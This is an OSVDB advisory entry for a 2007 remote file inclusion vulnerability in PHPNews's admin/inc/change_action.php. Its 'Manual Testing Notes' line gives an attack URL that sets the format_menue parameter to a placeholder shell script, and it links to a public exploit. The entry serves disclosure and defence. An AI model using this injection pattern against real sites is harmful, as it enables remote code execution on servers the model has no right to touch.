PHPNews change_action.php format_menue Variable Remote File Inclusion

2007-08-07T00:00:00
ID OSVDB:40111
Type osvdb
Reporter OSVDB
Modified 2007-08-07T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/admin/inc/change_action.php?format_menue=[[Sh3LLScript]]

References:

Vendor Specific News/Changelog Entry: http://sourceforge.net/project/showfiles.php?group_id=66322 ISS X-Force ID: 35835 Generic Exploit URL: http://www.milw0rm.com/exploits/4268 FrSIRT Advisory: ADV-2007-2810 CVE-2007-4232 Bugtraq ID: 25223